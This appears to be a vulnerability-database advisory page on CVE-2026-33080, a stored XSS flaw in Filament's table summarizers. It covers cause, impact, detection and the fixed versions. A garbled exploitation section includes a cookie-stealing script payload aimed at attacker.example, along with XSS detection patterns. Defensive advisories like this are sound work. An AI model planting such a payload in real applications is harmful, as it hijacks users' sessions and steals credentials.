
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33080 is a stored Cross-Site Scripting (XSS) vulnerability in Filament, a collection of full-stack components for accelerated Laravel development. The flaw affects the filament/tables package in versions 4.0.0 through 4.8.4 and 5.0.0 through 5.3.4, where the Range and Values table summarizers render raw database values without HTML escaping. It was published on March 18, 2026, by maintainer danharrin and patched the same day. The GitHub Advisory Database rates this as High severity with a CVSS v3.1 score of 7.3, while the Feedly intelligence data notes a score of 5.4 (Medium) under a different scope assumption (GitHub Advisory, Filament Security Advisory).
The root cause is improper neutralization of HTML in web page generation (CWE-79, CWE-80): the Range.php and Values.php summarizer classes in packages/tables/src/Columns/Summarizers/ output formatted state values directly into HTML templates without applying HTML entity encoding. An authenticated attacker with write access to data fields consumed by these summarizers can store malicious HTML or JavaScript payloads in the database. When any user views a Filament table that uses the Range or Values summarizer on the affected column, the stored payload executes in their browser. The fix, applied in commit efa041a, wraps the formatState() output with HTML escaping (e.g., htmlspecialchars()) in both Range.php and Values.php (GitHub Commit, Filament Security Advisory).
Successful exploitation allows an authenticated attacker to persistently inject malicious scripts that execute in the browsers of all users who view the compromised table, including administrators. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and application interface defacement. Because the payload is stored in the database, every subsequent page load of the affected table triggers the attack without further attacker interaction (GitHub Advisory, Feedly).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of this report (Feedly). The EPSS score is approximately 0.026–0.032%, placing it in a low exploitation-probability tier. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires low privileges (authenticated access to submit data) and user interaction (a victim must view the affected table), which somewhat limits the attack surface.
filament/tables versions 4.0.0–4.8.4 or 5.0.0–5.3.4 by inspecting Composer dependency files (composer.json, composer.lock) or HTTP response headers/footers that reveal the framework.<script>document.location='https://attacker.example/steal?c='+document.cookie</script>) through the Filament form or directly via the application's API/database interface.<script>, <img>, onerror=, javascript:) in fields associated with columns using Range or Values summarizers.<script>, <svg onload=, <img src=x onerror=) in columns rendered by Filament summarizers.Upgrade filament/tables to version 4.8.5 (for the 4.x branch) or 5.3.5 (for the 5.x branch), which apply HTML escaping to the Range and Values summarizer output (Filament v4.8.5 Release, Filament v5.3.5 Release). As a temporary workaround prior to patching, implement strict server-side input validation and sanitization for all data fields rendered by Range or Values summarizers to reject or strip HTML/JavaScript content. Additionally, consider restricting write access to affected data fields to trusted users only until the patch is applied (GitHub Advisory).
The advisory was published by Filament maintainer danharrin on March 18, 2026, and patched the same day, reflecting a responsible disclosure and rapid remediation process. Community activity on the v5.3.5 release noted positive reactions (🎉 8, 🚀 4) from contributors, suggesting the release was well-received (Filament v5.3.5 Release). No significant independent researcher commentary or major media coverage has been identified beyond standard vulnerability database aggregation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."